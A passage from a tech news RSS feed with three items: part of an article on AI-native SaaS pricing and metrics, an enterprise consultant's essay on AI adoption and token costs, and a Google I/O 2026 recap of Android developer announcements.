<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[17 Things to know for Android developers at Google I/O]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP, Product Management, Android DeveloperToday at Google I/O, we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcemen...]]></description>
<link>https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:45 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP7OJeCTRC-RN9j39-rULmU26qB-lZoyIZjjDrq07Z7b5GsfHz3q18ftSgcWReGBgIBkp03B6BVghzWllOC38o4jckzzq-e4a8R23ISeegev98zubhGXbIzhTZaqbCTaPLJC2zkxKYvvNspcM4yXkk94f6PEQHpdyMvlpwogicTWQRn3GEksJHOTQDIG4/s2048/GoogleForDevelopers-AndroidText-StrapiMetacard-2048x1323.png">


<div><div class="separator"><div class="separator"><div class="separator"><i>Posted by Matthew McCullough, VP, Product Management, Android Developer</i></div></div></div></div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s4209/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s16000/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"></a></div><div><br></div>Today at <a href="https://io.google/2026/">Google I/O,</a> we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcements for Android developers; you can also <a href="https://www.youtube.com/live/KvTRMSa1w4E?si=QBAxNvihPwJCJUuS">see what was announced last week</a> in <a href="https://developer.android.com/events/show">The Android Show: I/O Edition</a>. Stay tuned over the next two days as we dive into all of the topics in more detail!<h2><strong><span>Build High Quality Android Apps Using Agents</span></strong></h2>

  <h3><strong><span>1: Android CLI: helping you build with any agent, LLM, and tool</span></strong></h3>
  <a href="https://goo.gle/CLI_IO26">Android CLI is now stable</a>. It offers programmatic tools that allow any AI agent, including Claude Code, Codex, or Antigravity, to perform core Android tasks much more easily and efficiently. With today’s release, it also provides a bridge to tap directly into the "heavy-lifting" power of Android Studio to give you the production-ready polish needed for professional Android development. By leveraging the new android studio commands, developers can now grant their preferred agents the ability to perform semantic symbol resolution, analyze files for warnings, and even render Jetpack Compose previews. This release also enables official support for "Journeys" through new <a href="https://developer.android.com/tools/agents/android-skills">Android skills</a>, which enables agents to execute end-to-end UI tests under your direction. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.    <p><span></span></p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXrW3yDK9uH_I8MDyVxgYbPAXfrNTJvlMkXhaZFrM1X9ob0LvQbGe_ZC6anUeO_VNd181iptI_MIuEEpX-9GZdf6ZTJCN-WHpPzDCLOeSblo8vrjliSZ0rRrHwIsERWBjbbosP-M_WvA2pva9mF5FWVygAwQbdiW3SLZgJj9TpRIruG4H-ILsvSq_b4dc/w640-h442/agy-android-cli%20(2).png"></div><div class="separator"><span><i>You can now easily install Android CLI for use with Google Antigravity 2.0.</i></span></div><p></p>

  <h3><strong><span>2: Build production-ready apps with ease in Google AI Studio</span></strong></h3>
  Developers and creators can now <a href="http://android-developers.googleblog.com/2026/05/build-android-apps-google-ai-studio.html">build native Android apps, simply with a prompt in Google AI Studio</a>. The apps are built with development best practices like Jetpack Compose, Kotlin, and APIs that leverage our recommended developer patterns. Google AI Studio enables developers to prototype, iterate via an embedded emulator, and deploy to physical devices without heavy local installations. Developers are then able to take those apps and share them to Android devices, as well as share them with others for testing through Google Play Console’s internal testing track. If a developer wants to prepare their app for a wider release, they’re able to take it to Android Studio for advanced debugging, testing, and UI polish. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.<br><br><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdRaw1v6rolr4alo0C6AWKdFchsMEQgtOGfmk2Ramb0IoOB7smDcVU3yC7YJMkvVQuCPJ9vQW53tQjaV-5wcgOGzMtFDmb_Jbv40an1kvQdqYburXnsONvLqckKL2MWuShi3XmQEstW761oOLjujOk3FMsh3FyAiy5-Pe7xdTwFdfkWOmEnHhQfUJhtCo/w640-h544/image1.gif"></div><i><div class="separator"><i>Use the embedded Android Emulator to create Android apps in Google AI Studio</i></div></i></div><h2><strong><span>3: Accelerating AI coding assistance with Android Bench</span></strong></h2>
  <a href="http://d.android.com/bench">Android Bench</a> is our LLM leaderboard for Android development challenges. The goal is to accelerate model improvements, so you have more useful options for AI assistance. Many of you have been using open-weight models for AI assistance, so we’re now adding commonly used ones, such as Gemma 4, to the leaderboard, so you can see how LLMs that offer offline access and additional flexibility for power-users measure up. We're continuously working on increasing the difficulty of challenges we’re giving LLMs, to continue encouraging more useful improvements. <h3><strong><span>4: Convert iOS apps to Android with the Migration Assistant in Android Studio</span></strong></h3>
  The Migration Assistant in Android Studio is designed to port apps from platforms like iOS, React Native, or web frameworks to native Android. By simply selecting an existing project, developers can have the agent intelligently map features, convert assets like storyboards and SVGs, and implement Android best practices using Jetpack Compose and our recommended Jetpack libraries. This effectively transforms what used to be weeks of manual porting into a streamlined agentic workflow that only takes hours. We shared a preview of the incoming feature in the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>. </div><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7UKI_nzS7gOkDXYONAjCNbQ4eSqlgT8qqMT5D4qf0OjQUNtxj4Urpq-eTROMEDgrqLKGlwMm_lHA7ayG_BC1DkitQI1ZKsF5gYr-mPIxFUsz_8JPcVHFAtnHZoO2CrVjMEvJrqvBz8_WU1I0T1P2diDprR2B47PcA21oS3RLtbgrhmrpiWV-MAw9ks4/w640-h360/image9%20(1).gif"></div><div class="separator"><i>A sneak peek of the Migration Assistant converting an iOS app into a native Android app</i></div>

  <h2><strong><span>Building AI Into Your Apps</span></strong></h2>

  <h3><strong><span>5: Building Intelligent Apps with generative AI</span></strong></h3>
  Generative AI enables you to create apps that are more intelligent, personalized, and agentic than ever before. This year, we introduced the latest advancements in on-device intelligence with a preview of Gemini Nano 4 for tasks like data extraction and summarization. We also expanded cloud capabilities via Firebase AI Logic, allowing developers to leverage Gemini models with robust grounding (including URL, Maps, and web search) to build smarter, more capable assistants. Furthermore, we unveiled our hybrid inference approach and the new <a href="https://goo.gle/ADK_IO26">Agent Development Kit (ADK) for Android</a>, alongside communication protocols like AG-UI and A2UI that simplify the creation of autonomous, agentic experiences. To start integrating these powerful features, explore the <a href="https://developer.android.com/ai">developer documentation</a>, and watch the technical deep dive session where we showcase all these technologies.

  <h3><strong><span>6: Experiment with AppFunctions today</span></strong></h3>
  AppFunctions is an <a href="https://developer.android.com/reference/android/app/appfunctions/package-summary">Android platform API</a> with an accompanying <a href="https://developer.android.com/jetpack/androidx/releases/appfunctions">Jetpack library</a> to simplify building Android MCP integrations. It empowers your apps to behave like on device MCP servers, contributing functions that act as tools for use by agents and assistants. AppFunctions integration with Gemini is currently in a private preview with trusted testers, and you can begin preparing your apps already. You can sign up for the <a href="http://goo.gle/eap-af">Early Access Program</a> and start experimenting using the <a href="http://d.android.com/ai/appfunctions">API guidance</a>, <a href="https://github.com/android/appfunctions">sample</a>, and <a href="https://github.com/android/skills/blob/main/device-ai/appfunctions/SKILL.md">skill</a> today.

  <h2><strong><span>The Future is Adaptive</span></strong></h2>

  <h3><strong><span>7: Android is now Compose First; Views are now in maintenance mode.</span></strong></h3>
  Compose is our standard for UI development, and we are moving to a Compose-first approach for all future guidance and libraries. Building on five years of evolution, the latest releases deliver a more mature toolkit, from the highly customizable Styles API to refined shared element transitions and enhanced input support. These updates allow you to build beautiful, adaptive apps with less code and better performance. Learn more about what Compose-first means for Android Development in <a href="http://android-developers.googleblog.com/2026/05/android-ui-development-is-compose-first.html">our blog post</a>. <br><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9kh5gxOfSdY2w9ZeKdWropXpqP7rj4KtodIZA5B_j7ujQu-blrsQKKC0lI4VEsEycpLEwsZeJhHaNOY1Xe9DrIHDwVszYfQN0GQlwxz8xoVfg1oiIr9zNlUyqqdCl2M7pyHoHgVvC7omKRthmXNaO3GE5Q15XeZ1ALiugszd8qHxpWuHo2Eh79zYW4M/w640-h416/image5.png"></div><div><div><i>Build Android UI with Compose</i></div><h3><strong><span>8: Building seamless Android experiences across devices with Jetpack Compose</span></strong></h3><div>The Android ecosystem is now <a href="https://goo.gle/AdaptiveApps_IO26">Adaptive by Default</a>, moving fluidly across phones, foldables, tablets, cars, XR, and expanding usages with <a href="https://developer.android.com/googlebook">Googlebook</a> and connected displays. With over 580 million large-screen devices, and users on multiple devices spending up to 14x more on apps, the investment in adaptive design presents a massive opportunity. <a href="https://developer.android.com/compose">Jetpack Compose</a> is the definitive engine for this transition, offering core tools like our latest <a href="http://goo.gle/nav3">Jetpack Navigation 3</a> release, new experimental <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/grid">Grid</a> and <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/flexbox">FlexBox</a> layouts, enhanced non-touch input support, and <a href="https://developer.android.com/media/camera/camerax">CameraX</a> for correct camera previews across any window size. Furthermore, new <a href="https://developer.android.com/tools/agents/android-skills">skills</a> in Android Studio make updating your existing app to adopt these adaptive patterns easier than ever.

  <img src="https://blogger.googleusercontent.com/img/a/AVvXsEi3DD3G6IUrmOwYh7bMq0uieBvGL8li2W48YnUfQfa3ZXy2kD7QvPorNfAyCSmFlBs4q0csXDqmZjhyGf8UHFE2pUNjvqxLaaJhmm6QpSBumq2YkMHI1jyiTNfh5WQhEEY9hP6vWhcbbwflygdTwYzoIdnuIqoht0S6iGKk4pVCnxL2wVXYBMBlcdeneD8"><i>Notability’s Android debut sets a new standard for premium productivity apps. Built with Jetpack Compose, Navigation 3, and Kotlin Multiplatform, it delivers an intuitive, adaptive experience across devices.</i></div><h3><strong><span>9: Create seamless experiences for Googlebook</span></strong></h3>
  Last week we announced <a href="https://developer.android.com/googlebook">Googlebook</a>, a high-performance laptop that provides a large-screen canvas for your existing apps. Building with adaptive principles today helps ensure your app will work on Googlebook. Get started by reviewing relevant <a href="https://developer.android.com/design/ui/desktop">design guidance</a> and <a href="https://developer.android.com/docs/quality-guidelines/adaptive-app-quality/experiences/desktop">developer guidelines</a> for desktop experiences. Try out the new Desktop Emulator available in the Android Studio Canary to to test your apps for this form factor today.</div><div><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtH3cjiXICi8dNCtQTDV9PTyjt4wPQBl1xA9XGKGU6FmqLRuBm9YyH7HNQsydD6H6F2GIPw2TdUsFyeu2xMFUO2Jk36k5QXjuWNdm_VE8AQftq2w2m0RPFyYfyZjTppSOjzuOEpJMzF08t9V0YZr-xI7mu31uvcRItugwvVxPUBouSmOXt1MsqbB1WPC0/w640-h360/image3.png"></div><div><div><i>New Desktop Android Emulator</i></div><h3><strong><span>10: Unified widget development experience with Jetpack Glance</span></strong></h3>
  Android 17 marks a shift toward a single, Compose-based development model for all widgets. By unifying the experience across mobile, Wear OS, and cars through Jetpack Glance, you can soon scale UI components across the ecosystem with a familiar workflow. <br><br>The breakthrough this year is the integration of RemoteCompose. On mobile and cars, it powers high-fidelity animations, while on Wear OS, it allows Wear Widgets (formerly Tiles) to render complex UI logic natively on remote surfaces. This ensures peak performance on low-power hardware while allowing a cohesive user journey—like checking a flight status on your car dashboard and seeing gate change updates on your wrist.</div><div><br></div><div><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5s4g4hCW89qdeC2oqrTtxh6q7t9q3-wkOSt3tfVzCT3vhLUd1GMYJrhCjK04O2jyxBGl0R2pclnRq3Kb0f0Td-hV9aukKvZQTfGpGJS6GLK0MqUkpVW_0qiNC1eMGe6NPPhlCHrnQWFYhmbdSzpDnUHh5tjvpmUzZOvY2w_dX1LBnpNctSRmeahXUl4/w640-h320/blog_widgets.gif"></div><div><i>Four widgets are shown cycling through in the Android Auto interface. A clock, a contact card, Google Home favorites and a photo.</i></div><div><i><br></i></div><div><strong><span>11: Expand your reach on the road with Android for Cars</span></strong><br>To help you expand your reach when you build in-car experiences, we're making it easier to build once and deliver your apps to Android Auto and Android Automotive OS. With the latest releases of the Car App Library, you can build customized, distraction-optimized <a href="https://developer.android.com/training/cars/apps/media">templated media apps</a> for both platforms. We're introducing new <a href="https://developer.android.com/design/ui/cars/guides/components/overview">components</a> and template capabilities to give you increased flexibility and more options for laying out content. Parked experiences are expanding too, with immersive video playback coming to Android Auto for phones running Android 17. You can easily adapt your video apps for these parked experiences; <a href="https://docs.google.com/forms/d/e/1FAIpQLSf0z4Nfw8wrloVhlgHDpLgdkg4WXsFj9ni5c1pw0qTvJ3Q4fQ/viewform">apply now to the early access program</a> to publish in these beta categories and learn more about the latest updates in our <a href="http://android-developers.googleblog.com/2026/05/android-for-cars-unifying-platforms-premium-experiences.html">blog</a>.<h3><strong><span>12: Accelerate your development with Android XR Developer Preview 4</span></strong></h3>Inspired by the innovative experiences you’ve built for the platform, we’re continuing to mature our tools with <a href="https://goo.gle/XRSDK_IO26">Developer Preview 4 of the Android XR SDK</a>. A key milestone in this 